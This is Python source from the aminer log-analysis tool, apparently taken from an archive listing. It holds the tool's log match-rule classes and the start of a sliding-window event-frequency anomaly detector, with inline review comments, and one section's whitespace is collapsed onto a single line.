        if isinstance(value, (str, bytes)) and len(value) == 0:
            msg = "value must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Check if this rule matches.

        On match an optional match_action could be triggered. str/bytes values are compared after encoding the str
        side, without altering either the rule's value or the parsed match object.
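"""
        self.log_total += 1
        test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None)
        if test_value is None:
            return False
        # Compare through local copies: the previous implementation rewrote test_value.match_object (shared with every
        # other rule and handler that sees this atom) and self.value in place, so one evaluation changed what later
        # rules compared against.
        expected = self.value
        observed = test_value.match_object
        if isinstance(expected, bytes) and isinstance(observed, str):
            observed = observed.encode()
        elif isinstance(expected, str) and isinstance(observed, bytes):
            expected = expected.encode()
        elif not isinstance(expected, type(observed)):
            raise TypeError(f"The type of the value of the ValueMatchRule does not match the test_value. value: {type(self.value)}, "
                            f"test_value: {type(test_value.match_object)}")
        if observed == expected:
            if self.match_action is not None:
                self.match_action.match_action(log_atom)
            self.log_success += 1
            return True
        return False

    def __str__(self):
        """Render as value(<path>)==<value>; a bytes value is decoded for display only, self.value is left untouched."""
        value = self.value
        if isinstance(value, bytes):
            value = value.decode()
        return f"value({self.target_path})=={value}"


class ValueListMatchRule(MatchRule):
    """Match elements of this class return true when the given path exists and has exactly one of the values included in the value list."""

    def __init__(self, target_path, target_value_list, match_action=None):
        """Create the rule.

        @param target_path non-empty parser path whose match_object is looked up in the list.
        @param target_value_list non-empty list of accepted values; str/bytes entries must not be empty.
        @param match_action if None, no action is performed.
        @raises TypeError when an argument has the wrong type, ValueError for an empty path or empty value list/entries.
        """
        self.target_path = target_path
        self.target_value_list = target_value_list
        self.match_action = match_action
        if not isinstance(target_path, str):
            msg = "target_path has to be of type String."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if target_path == "":
            msg = "target_path must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if not isinstance(target_value_list, list):
            msg = "target_value_list must be of type list."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if not all(isinstance(x, (bytes, str)) and len(x) != 0 or not isinstance(x, (bytes, str)) for x in target_value_list) or \
                len(target_value_list) == 0:
            msg = "target values must not be empty."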
# NOTE(review): reflowed from a collapsed archive listing; the checks below finish ValueListMatchRule.__init__, whose
# header is on the previous line, and the block ends inside ValueRangeMatchRule.__init__.
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Check if this rule matches.

        On match an optional match_action could be triggered. Membership is a linear scan of target_value_list using
        ==, so no str/bytes conversion happens here (unlike ValueMatchRule).
        """
        self.log_total += 1
        test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path)
        if (test_value is not None) and (test_value.match_object in self.target_value_list):
            if self.match_action is not None:
                self.match_action.match_action(log_atom)
            self.log_success += 1
            return True
        return False

    def __str__(self):
        return f"value({' '.join([str(value) for value in self.target_value_list])}) in {self.target_path}"


class ValueRangeMatchRule(MatchRule):
    """Match elements of this class return true when the given target_path exists and the value is included in [lower, upper] range."""

    def __init__(self, target_path, lower_limit, upper_limit, match_action=None):
        """Create the rule.

        @param target_path non-empty parser path whose match_object is range-checked.
        @param lower_limit, upper_limit inclusive bounds; int or float (bool rejected), lower must be strictly smaller.
        @param match_action if None, no action is performed.
        @raises TypeError when an argument has the wrong type, ValueError on an empty path or a non-increasing range.
        """
        self.target_path = target_path
        self.lower_limit = lower_limit
        self.upper_limit = upper_limit
        self.match_action = match_action
        if not isinstance(target_path, str):
            msg = "target_path has to be of type String."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # bool is a subclass of int, so it is excluded explicitly.
        if isinstance(lower_limit, bool) or not isinstance(lower_limit, (int, float)):
            msg = "lower_limit has to be of type int or float."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if isinstance(upper_limit, bool) or not isinstance(upper_limit, (int, float)):
            msg = "upper_limit has to be of type int or float."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if lower_limit >= upper_limit:
            msg = "lower_limit must be smaller than upper_limit."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if target_path == "":
            msg = "target_path must not be empty."
# NOTE(review): reflowed from a collapsed archive listing; the checks below finish ValueRangeMatchRule.__init__, whose
# header is on the previous line, and the block ends inside StringRegexMatchRule.match's docstring.
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Check if this rule matches.

        On match an optional match_action could be triggered. The chained comparison raises TypeError when the parsed
        match_object is not orderable against the numeric limits (e.g. bytes) -- presumably the parser guarantees a
        number for this path; confirm.
        """
        self.log_total += 1
        test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None)
        if test_value is None:
            return False
        test_value = test_value.match_object
        if self.lower_limit <= test_value <= self.upper_limit:
            if self.match_action is not None:
                self.match_action.match_action(log_atom)
            self.log_success += 1
            return True
        return False

    def __str__(self):
        return f"value({self.target_path}) inrange ({self.lower_limit}, {self.upper_limit})"


class StringRegexMatchRule(MatchRule):
    """Elements of this class return true when the given path exists and the string repr of the value matches the regular expression."""

    def __init__(self, target_path, match_regex, match_action=None):
        """Create the rule.

        @param target_path non-empty parser path whose match_string is tested.
        @param match_regex a compiled re.Pattern; it is applied with .match(), i.e. anchored at the start only (see match()).
        @param match_action if None, no action is performed.
        @raises TypeError when an argument has the wrong type, ValueError when target_path is empty.
        """
        self.target_path = target_path
        self.match_regex = match_regex
        self.match_action = match_action
        if not isinstance(target_path, str):
            msg = "target_path has to be of type String."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if target_path == "":
            msg = "target_path must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if not isinstance(match_regex, re.Pattern):
            msg = "match_regex has to be of type re.Pattern."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Check if this rule matches.

        On match an optional match_action could be triggered. Uses re.Pattern.match(), which anchors at the beginning
        of match_string but not at its end: a pattern without a trailing "$" accepts any longer string sharing the
        prefix, so rules meant to accept exact values need an explicit end anchor.
"""
        self.log_total += 1
        # A missing path is reported as None by dict.get and yields no match.
        test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None)
        if (test_value is None) or (self.match_regex.match(test_value.match_string) is None):
            return False
        if self.match_action is not None:
            self.match_action.match_action(log_atom)
        self.log_success += 1
        return True

    def __str__(self):
        return f"string({self.target_path}) =regex= {self.match_regex.pattern}"


class ModuloTimeMatchRule(MatchRule):
    """Match elements of this class return true when the following conditions are met.

    The given target_path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value
    are included in [lower, upper] range.
    """

    def __init__(self, target_path, seconds_modulo, lower_limit, upper_limit, match_action=None, tzinfo=None):
        """
        @param target_path the target_path to the datetime object to use to evaluate the modulo time rules on. When None,
        the default timestamp associated with the match is used.
        NOTE(review): the isinstance(str) check below rejects None with a TypeError although match() has a branch for
        it -- the docstring and the validation disagree; confirm which is intended.
        @param seconds_modulo positive int the timestamp is reduced by.
        @param lower_limit, upper_limit int bounds of the accepted remainder (validated on the next line of the listing).
        @param match_action if None, no action is performed.
        @param tzinfo datetime.timezone used to shift the parsed time; defaults to the local zone at construction time.
        """
        self.target_path = target_path
        self.seconds_modulo = seconds_modulo
        self.lower_limit = lower_limit
        self.upper_limit = upper_limit
        self.match_action = match_action
        self.tzinfo = tzinfo
        if tzinfo is None:
            self.tzinfo = datetime.now(timezone.utc).astimezone().tzinfo
        if not isinstance(target_path, str):
            msg = "target_path has to be of type String."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if target_path == "":
            msg = "target_path must not be empty."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if isinstance(seconds_modulo, bool) or not isinstance(seconds_modulo, int):
            msg = "seconds_modulo has to be of type int."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if seconds_modulo <= 0:
            msg = "seconds_modulo must be bigger than zero."
# NOTE(review): reflowed from a collapsed archive listing; the checks below finish ModuloTimeMatchRule.__init__, whose
# header is on the previous line, and the block ends inside ModuloTimeMatchRule.match's docstring.
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        # bool is a subclass of int, so it is excluded explicitly.
        if isinstance(lower_limit, bool) or not isinstance(lower_limit, int):
            msg = "lower_limit has to be of type int."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if isinstance(upper_limit, bool) or not isinstance(upper_limit, int):
            msg = "upper_limit has to be of type int."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if lower_limit >= upper_limit:
            msg = "lower_limit must be smaller than upper_limit."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if lower_limit < 0:
            msg = "lower_limit must be greater than or equal zero."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if upper_limit <= 0:
            msg = "upper_limit must be greater than zero."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        # The remainder never reaches seconds_modulo, so a larger upper bound would be meaningless.
        if upper_limit > seconds_modulo:
            msg = "upper_limit can not be greater than seconds_modulo."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if match_action is not None and not isinstance(match_action, MatchAction):
            msg = "match_action has to be of type MatchAction."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if not isinstance(self.tzinfo, timezone):
            msg = "tzinfo has to be of type datetime.timezone."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)

    def match(self, log_atom):
        """Check if this rule matches.

        On match an optional match_action could be triggered. The timestamp is shifted by the configured zone's
        current UTC offset and reduced modulo seconds_modulo before the range check.
"""
        self.log_total += 1
        test_value = None
        if self.target_path is None:
            test_value = log_atom.get_timestamp()
        else:
            time_match = log_atom.parser_match.get_match_dictionary().get(self.target_path, None)
            if time_match is None:
                return False
            # NOTE(review): the offset is taken from datetime.now(), i.e. the DST state at evaluation time rather than at
            # the log timestamp -- confirm this is intended for zones with DST.
            test_value = time_match.match_object + datetime.now(self.tzinfo).utcoffset().total_seconds()
        # get_timestamp() may yield None; treat that as no match rather than failing on the modulo below.
        if test_value is None:
            return False
        test_value %= self.seconds_modulo
        if self.lower_limit <= test_value <= self.upper_limit:
            if self.match_action is not None:
                self.match_action.match_action(log_atom)
            self.log_success += 1
            return True
        return False


class ValueDependentModuloTimeMatchRule(MatchRule):
    """Match elements of this class return true when the following conditions are met.

    The given path exists, denotes a datetime object and the seconds since 1970 from that date modulo the given value are
    included in a [lower, upper] range selected by values from the match.
    """

    def __init__(self, target_path, seconds_modulo, target_path_list=None, limit_lookup_dict=None, default_limit=None,
                 match_action=None, tzinfo=None):
        """
        @param target_path the target_path to the datetime object to use to evaluate the modulo time rules on. When None,
        the default timestamp associated with the match is used.
        NOTE(review): as in ModuloTimeMatchRule, the isinstance(str) check below rejects None -- docstring and validation
        disagree; confirm which is intended.
        @param seconds_modulo positive int the timestamp is reduced by.
        @param target_path_list paths whose values select the limits from limit_lookup_dict.
        @param limit_lookup_dict maps a value to a [lower, upper] list; validated on the next line of the listing.
        @param default_limit use this default limit when limit lookup failed. Without a default limit, a failed lookup will
        cause the rule not to match.
        @param match_action if None, no action is performed.
        @param tzinfo datetime.timezone used to shift the parsed time; defaults to the local zone at construction time.
        """
        self.target_path = target_path
        self.seconds_modulo = seconds_modulo
        self.target_path_list = target_path_list
        self.limit_lookup_dict = limit_lookup_dict
        self.default_limit = default_limit
        self.match_action = match_action
        self.tzinfo = tzinfo
        if tzinfo is None:
            self.tzinfo = datetime.now(timezone.utc).astimezone().tzinfo
        if not isinstance(target_path, str):
            msg = "target_path has to be of type String."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if target_path == "":
            msg = "target_path must not be empty."
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if isinstance(seconds_modulo, bool) or not isinstance(seconds_modulo, int): msg = "seconds_modulo has to be of type int." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if seconds_modulo <= 0: msg = "seconds_modulo must be bigger than zero." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if target_path_list is not None and (not isinstance(target_path_list, list) or not all(isinstance(x, str) and len(x) > 0 for x in target_path_list)): msg = "target_path_list has to be a list of strings." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if limit_lookup_dict is not None and ( not isinstance(limit_lookup_dict, dict) or None in limit_lookup_dict.keys() or not all(isinstance(x, list) and all(not isinstance(y, bool) and isinstance(y, (int, float)) for y in x) and len(x) == 2 and x[0] < x[1] <= seconds_modulo for x in limit_lookup_dict.values())): msg = "limit_lookup_dict has to be of type dict with a list of two integer or float limit values as values. " \ "The first limit value must be smaller than the second and both must be smaller than seconds_modulo." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if default_limit is not None and ( not isinstance(default_limit, list) or not all(not isinstance(x, bool) and isinstance(x, (int, float)) for x in default_limit) or len(default_limit) != 2 or default_limit[0] > default_limit[1] or default_limit[1] > seconds_modulo): msg = "default_limit has to be a list with two integer or float limit values. The first value must be smaller than the " \ "second and both must be smaller than seconds_modulo." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if default_limit is None and (not limit_lookup_dict or not target_path_list): msg = "Either default_limit or limit_lookup_dict and target_path_list must not be None." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not isinstance(self.tzinfo, timezone): msg = "tzinfo has to be of type datetime.timezone." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() value_list = [] for path in self.target_path_list: value_element = match_dict.get(path) if value_element is not None: value_list.append(value_element.match_object) if len(value_list) > 0: value = value_list[0] else: value = None limits = self.limit_lookup_dict.get(value, self.default_limit) if limits is None: return False if self.target_path is None: test_value = log_atom.get_timestamp() else: time_match = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if time_match is None: return False test_value = time_match.match_object + datetime.now(self.tzinfo).utcoffset().total_seconds() test_value %= self.seconds_modulo if limits[0] <= test_value <= limits[1]: if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False class IPv4InRFC1918MatchRule(MatchRule): """Match elements of this class return true when the path matches and contains a valid IPv4 address from the RFC1918 private IP ranges. This could also be done by distinct range match elements, but as this kind of matching is common, have an own element for it. """ def __init__(self, target_path, match_action=None): self.target_path = target_path self.match_action = match_action if not isinstance(target_path, str): msg = "target_path has to be of type String." 
logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if target_path == "": msg = "target_path must not be empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) if match_action is not None and not isinstance(match_action, MatchAction): msg = "match_action has to be of type MatchAction." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 match_element = log_atom.parser_match.get_match_dictionary().get(self.target_path) if (match_element is None) or not isinstance(match_element.match_object, int): return False value = match_element.match_object if ((value & 0xff000000) == 0xa000000) or ((value & 0xfff00000) == 0xac100000) or ((value & 0xffff0000) == 0xc0a80000): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f"hasPath({self.target_path})" class DebugMatchRule(MatchRule): """This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just prints out the current log_atom that is evaluated. The match action is always invoked when defined, no matter which match result is returned. """ def __init__(self, debug_match_result=False, match_action=None): self.debug_match_result = debug_match_result self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. 
""" self.log_total += 1 print(f'Rules.DebugMatchRule: triggered while handling "{repr(log_atom.parser_match.match_element.match_string)}"', file=sys.stderr) if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return self.debug_match_result def __str__(self): return f"{self.debug_match_result}" class DebugHistoryMatchRule(MatchRule): """This rule can be inserted into a normal ruleset just to see when a match attempt is made. It just adds the evaluated log_atom to a ObjectHistory. """ def __init__(self, object_history=None, debug_match_result=False, match_action=None): """Create a DebugHistoryMatchRule object. @param object_history use this ObjectHistory to collect the LogAtoms. When None, a default LogarithmicBackoffHistory for 10 items. """ if object_history is None: object_history = LogarithmicBackoffHistory(10) elif not isinstance(object_history, ObjectHistory): msg = "object_history is not an instance of ObjectHistory" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.object_history = object_history self.debug_match_result = debug_match_result self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered. """ self.log_total += 1 self.object_history.add_object(log_atom) if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return self.debug_match_result def get_history(self): """Get the history object from this debug rule.""" return self.object_history SlidingEventFrequencyDetector.py000066400000000000000000000417701500476301700373010ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines a detector for event and value frequency exceedances with a sliding window approach. 
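This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see .
"""
import os
import logging
from collections import deque

from aminer.events.EventInterfaces import EventSourceInterface
from aminer.AminerConfig import STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, DEBUG_LOG_NAME
from aminer import AminerConfig
from aminer.AnalysisChild import AnalysisContext
from aminer.input.InputInterfaces import AtomHandlerInterface


class SlidingEventFrequencyDetector(AtomHandlerInterface, EventSourceInterface):
    """This class creates events when event or value frequencies exceed the set limit.

    Occurrence times are kept per event in a deque; the frequency is the number of occurrences within the last window_size seconds
    (sliding window). Two kinds of anomalies are reported: the first time the frequency exceeds set_upper_limit, and the local
    maximum reached by an exceedance once the frequency falls off again.
    """

    time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME

    def __init__(self, aminer_config, anomaly_event_handlers, set_upper_limit, target_path_list=None, scoring_path_list=None,
                 window_size=600, local_maximum_threshold=0.2, persistence_id="Default", learn_mode=False, output_logline=True,
                 ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None,
                 log_resource_ignore_list=None):
        """Initialize the detector.

        @param aminer_config configuration from analysis_context.
        @param anomaly_event_handlers for handling events, e.g., print events to stdout.
        @param set_upper_limit sets the upper limit of the frequency test to the specified value. Must be a positive number.
        @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their
               combined occurrences. When no paths are specified, the events given by the full path list are analyzed.
        @param scoring_path_list parser paths of values to be analyzed by following event handlers like the ScoringEventHandler.
               Multiple paths mean that values are analyzed by their combined occurrences.
        @param window_size the length of the time window for counting in seconds. Must be positive.
        @param local_maximum_threshold sets the threshold for the detection of local maxima in the frequency analysis. A local
               maximum occurs if the last maximum of the anomaly is higher than local_maximum_threshold times the upper limit.
        @param persistence_id name of persistence document.
        @param learn_mode specifies whether new frequency measurements override ground truth frequencies.
        @param output_logline specifies whether the full parsed log atom should be provided in the output.
        @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are
               omitted. The default value is [] as None is not iterable.
        @param constraint_list list of paths that have to be present in the log atom to be analyzed.
        @param stop_learning_time switch the learn_mode to False after the time.
        @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
        @param log_resource_ignore_list atoms whose source resource_name is in this list are skipped entirely.
        @raises TypeError when set_upper_limit is missing, or set_upper_limit/window_size/local_maximum_threshold are not numbers.
        @raises ValueError when set_upper_limit or window_size is not positive, or local_maximum_threshold is negative.
        """
        # Avoid "defined outside init" issue
        self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5
        self.stop_learning_time_initialized = None
        super().__init__(
            mutable_default_args=["target_path_list", "scoring_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"],
            aminer_config=aminer_config, window_size=window_size, anomaly_event_handlers=anomaly_event_handlers,
            target_path_list=target_path_list, scoring_path_list=scoring_path_list, set_upper_limit=set_upper_limit,
            local_maximum_threshold=local_maximum_threshold, persistence_id=persistence_id, learn_mode=learn_mode,
            output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time,
            stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list
        )
        if not self.set_upper_limit:
            msg = "set_upper_limit must not be None."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        # Validate the numeric parameters at configuration time. Previously a non-numeric or non-positive limit only failed later,
        # inside receive_atom() comparisons or print() (division by the limit-derived frequency). bool is excluded explicitly as
        # it is an int subclass.
        if isinstance(self.set_upper_limit, bool) or not isinstance(self.set_upper_limit, (int, float)):
            msg = "set_upper_limit has to be of type int or float."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if self.set_upper_limit <= 0:
            msg = "set_upper_limit must be greater than zero."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if isinstance(self.window_size, bool) or not isinstance(self.window_size, (int, float)):
            msg = "window_size has to be of type int or float."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if self.window_size <= 0:
            msg = "window_size must be greater than zero."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)
        if isinstance(self.local_maximum_threshold, bool) or not isinstance(self.local_maximum_threshold, (int, float)):
            msg = "local_maximum_threshold has to be of type int or float."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise TypeError(msg)
        if self.local_maximum_threshold < 0:
            msg = "local_maximum_threshold must not be negative."
            logging.getLogger(DEBUG_LOG_NAME).error(msg)
            raise ValueError(msg)

        # All per-event state is keyed by the event tuple returned by _get_log_event().
        self.counts = {}  # event -> deque of atom times (oldest first), trimmed to the window by reset_counter()
        self.scoring_value_list = {}  # event -> deque of values found at scoring_path_list (only when scoring paths are set)
        self.max_frequency = {}  # event -> highest frequency seen in the current exceedance, 0 when none is pending
        self.max_frequency_time = {}  # event -> atom time at which max_frequency was observed
        self.max_frequency_log_atom = {}  # event -> the atom observed at max_frequency, None when no maximum is pending
        self.ranges = {}
        self.exceeded_frequency_range = {}  # event -> True while the frequency is above the limit
        self.exceeded_frequency_range_time = {}  # event -> atom time of the last "first exceeded" report

    def _get_log_event(self, match_dict):
        """Derive the event key for a parsed atom.

        Without target paths the key is the tuple of all parser paths of the atom, subject to constraint_list; otherwise it is the
        tuple of the (stringified) values found at the target paths, in path order.
        @param match_dict the parser match dictionary of the atom.
        @return the event key, or None when the atom carries nothing to count.
        """
        if not self.target_path_list:
            # With constraints configured, at least one of the constraint paths must be present.
            if self.constraint_list != [] and not any(match_dict.get(path) is not None for path in self.constraint_list):
                return None
            return tuple(match_dict.keys())
        values = []
        for path in self.target_path_list:
            match = match_dict.get(path)
            if match is None:
                continue
            matches = match if isinstance(match, list) else [match]
            for single_match in matches:
                if isinstance(single_match.match_object, bytes):
                    values.append(single_match.match_object.decode(AminerConfig.ENCODING))
                else:
                    values.append(str(single_match.match_object))
        # decode()/str() never yield None, so the only "nothing found" case is an empty value list.
        if not values:
            return None
        return tuple(values)

    def receive_atom(self, log_atom):
        """Receive a log atom from a source.

        @return False when the atom is skipped (ignored resource or path, unmet constraint, no value at the target paths), True
                after the atom was counted.
        """
        for source in self.log_resource_ignore_list:
            if log_atom.source.resource_name == source:
                return False
        if not self.stop_learning_time_initialized:
            self.stop_learning_time_initialized = True
            if self.stop_learning_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
            elif self.stop_learning_no_anomaly_time is not None:
                self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
        # NOTE(review): learn_mode is not consulted anywhere else in this class, and stop_learning_time is never pushed out when an
        # anomaly is reported, so stop_learning_no_anomaly_time currently behaves exactly like stop_learning_time here.
        if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
            logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the " + str(self.__class__.__name__) + ".")
            self.learn_mode = False
        parser_match = log_atom.parser_match
        self.log_total += 1

        match_dict = parser_match.get_match_dictionary()
        # Skip paths from ignore list.
        for ignore_path in self.ignore_list:
            if ignore_path in match_dict.keys():
                return False

        log_event = self._get_log_event(match_dict)
        if log_event is None:
            return False

        # Initialize the per-event state at first occurrence.
        if log_event not in self.counts:
            self.counts[log_event] = deque()
            self.max_frequency[log_event] = 0
            self.max_frequency_time[log_event] = 0
            self.max_frequency_log_atom[log_event] = None
            self.exceeded_frequency_range[log_event] = False
            self.exceeded_frequency_range_time[log_event] = 0
            if len(self.scoring_path_list) > 0:
                self.scoring_value_list[log_event] = deque()
        self.counts[log_event].append(log_atom.atom_time)

        # Collect the id values for the anomaly message if scoring paths are configured.
        if len(self.scoring_path_list) > 0:
            for scoring_path in self.scoring_path_list:
                scoring_match = match_dict.get(scoring_path)
                if scoring_match is None:
                    continue
                if isinstance(scoring_match.match_object, bytes):
                    scoring_value = scoring_match.match_object.decode(AminerConfig.ENCODING)
                else:
                    scoring_value = scoring_match.match_object
                # NOTE(review): one entry is appended per matching scoring path, while counts gets exactly one entry per atom and
                # reset_counter() pops both in lockstep. With several scoring paths, or atoms lacking a path, the two drift apart
                # and the IdValues reported by print() no longer correspond to the window.
                self.scoring_value_list.setdefault(log_event, deque()).append(scoring_value)

        current_frequency = self.get_current_frequency(log_atom, log_event)
        # Remember the highest frequency (and its atom) of the current exceedance.
        if current_frequency >= self.set_upper_limit and current_frequency >= self.max_frequency[log_event]:
            self.max_frequency[log_event] = current_frequency
            self.max_frequency_time[log_event] = log_atom.atom_time
            self.max_frequency_log_atom[log_event] = log_atom
        self.reset_counter(log_atom, log_event)

        if not self.exceeded_frequency_range[log_event] and current_frequency > self.set_upper_limit:
            # The limit was just exceeded. Report it only if the previous report lies more than one window in the past.
            if self.exceeded_frequency_range_time[log_event] + self.window_size < log_atom.atom_time:
                self.print(log_event, current_frequency, first_exceeded_threshold=True)
                self.exceeded_frequency_range_time[log_event] = log_atom.atom_time
            self.exceeded_frequency_range[log_event] = True
        elif self.exceeded_frequency_range[log_event] and (
                self.max_frequency_time[log_event] + self.window_size < log_atom.atom_time
                or current_frequency <= self.set_upper_limit
                or current_frequency < self.max_frequency[log_event] - self.local_maximum_threshold * self.set_upper_limit):
            # The previous max_frequency is a local maximum: it lies one window in the past, the frequency returned into the
            # interval, or it dropped by more than local_maximum_threshold * limit below the maximum.
            # The maximum may already have been reported and cleared by an earlier atom of the same exceedance (the third
            # condition fires while the frequency is still above the limit); print() must not be called again then, as it
            # dereferences the cleared log atom and divides by the cleared (zero) maximum.
            if self.max_frequency_log_atom[log_event] is not None:
                self.print(log_event, self.max_frequency[log_event], first_exceeded_threshold=False)
            self.max_frequency[log_event] = 0
            self.max_frequency_time[log_event] = 0
            self.max_frequency_log_atom[log_event] = None
            self.reset_counter(log_atom, log_event)

        # Leave the exceedance once the frequency is back within the limit.
        if current_frequency <= self.set_upper_limit:
            self.exceeded_frequency_range[log_event] = False
        return True

    def print(self, log_event, frequency, first_exceeded_threshold=False):
        """Send an anomaly event to the listeners.

        The event is either the first exceeding of the limit or a local maximum. The log atom attached to the event is the one
        stored in max_frequency_log_atom for the event, so callers must only invoke this method while that atom is set.
        @param log_event the event key the anomaly belongs to.
        @param frequency the reported frequency: the current one for a first exceedance, the local maximum otherwise.
        @param first_exceeded_threshold True for the first exceedance, False for a local maximum report.
        """
        anomaly_log_atom = self.max_frequency_log_atom[log_event]
        try:
            data = anomaly_log_atom.raw_data.decode(AminerConfig.ENCODING)
        except UnicodeError:
            data = repr(anomaly_log_atom.raw_data)
        if self.output_logline:
            original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX)
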